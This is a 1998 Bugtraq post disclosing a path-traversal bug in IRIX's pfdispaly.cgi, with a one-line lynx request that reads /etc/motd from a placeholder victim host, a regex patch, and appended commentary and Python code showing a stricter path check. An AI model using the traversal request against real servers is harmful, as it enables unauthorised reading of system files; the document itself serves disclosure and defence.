Date: Tue, 17 Mar 1998 00:06:48 +0100
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: IRIX performer_tools bug

Do you remember the /cgi-bin/handler bug?
Well, more of the same:

Software:
IRIX 6.2 performer_tools.sw.webtools (Performer API Search Tool 2.2)
/var/www/cgi-bin/pfdispaly.cgi

Bug:
Anyone can read files (as 'nobody') from your system:

Exploit:
lynx -source \
'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
for instance :-)

Fix:
*** pfdispaly.cgi.O	Mon Mar 16 23:13:34 1998
--- pfdispaly.cgi	Mon Mar 16 23:36:29 1998
***************
*** 14,19 ****
--- 14,20 ----
  $fullcgiroot = "/var/www$cgiroot";
  $shortfilepath = "$ARGV[0]";
+ $shortfilepath =~ s/\.{2,}//g;
  $fullfilepath = "$maindocroot$shortfilepath";
  ($filename = $shortfilepath) =~ s/.*\/(.*)$/$1/;

Note:
I haven't tested the other Performer CGIs too much; maybe they will have
more nasty bugs.
(in fact, pfdispaly.cgi opens "$ARGV[0]" with "$maindocroot" prepended;
but somewhere 'dangerous' characters are escaped)

There is another bug in pfsearch.cgi, which lacks a
print "Content-type: text/html\n\n";
line, so you get garbage in your browser.
(and even worse, you have to enable JavaScript if you want to use this
set of CGIs...)

-- 
J.A. Gutierrez
So be easy and free when you're drinking with me
I'm a man you don't meet every day
finger me for PGP                                   (The Pogues)
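Review bot: the added line `$shortfilepath =~ s/\.{2,}//g;` rewrites the request instead of refusing it, and it is a deny-list of a single pattern. What escapes `$maindocroot` is a `..` path segment, so the safer change at this point in the script is to reject the request outright (print an error page and exit) when `$shortfilepath` contains a `..` segment, then check that the resulting `$fullfilepath` still lies under `$maindocroot` once canonicalised. As written, the substitution also mangles legitimate names that contain two or more consecutive dots, and because the request is silently served as a different path, the administrator never sees that a traversal was attempted; a rejected request can at least be logged.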
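The behaviour described under "Bug" and the one-line regex fix above, as an added Python example (not code from the post or from the Performer tools): it puts the post's strip-the-dots rewrite beside a check that resolves the requested path under the document root and refuses anything that would end up outside it. The document root value is a constructed placeholder, since the post does not give the real value of $maindocroot.

```python
import posixpath
import re
from typing import Optional

# Constructed placeholder: the post does not state the real $maindocroot of pfdispaly.cgi.
MAINDOCROOT = "/var/www/htdocs"


def patched_path(short: str, root: str = MAINDOCROOT) -> str:
    """Mirror the posted one-line fix: delete every run of two or more dots,
    then prepend the document root.  The request is rewritten, never refused,
    so a traversal attempt is served as some other (confined) path and leaves
    no trace that it was an attempt."""
    return root + re.sub(r"\.{2,}", "", short)


def confined_path(short: str, root: str = MAINDOCROOT) -> Optional[str]:
    """Allowlist-style replacement: normalise the joined path lexically and
    accept it only if it is still the root or something beneath the root.
    Returns None for anything that must be refused (and logged by the caller).
    posixpath.normpath touches no filesystem, so symlinks inside the root are
    not followed; on a live server, os.path.realpath followed by the same
    prefix test closes that gap."""
    if not short.startswith("/"):
        return None                      # only root-relative paths are accepted
    joined = posixpath.normpath(root + "/" + short.lstrip("/"))
    if joined != root and not joined.startswith(root + "/"):
        return None                      # would resolve outside $maindocroot
    return joined


if __name__ == "__main__":
    for req in ("/docs/index.html", "/../../../../etc/motd"):
        print(f"{req!r}: patched -> {patched_path(req)}, confined -> {confined_path(req)}")
```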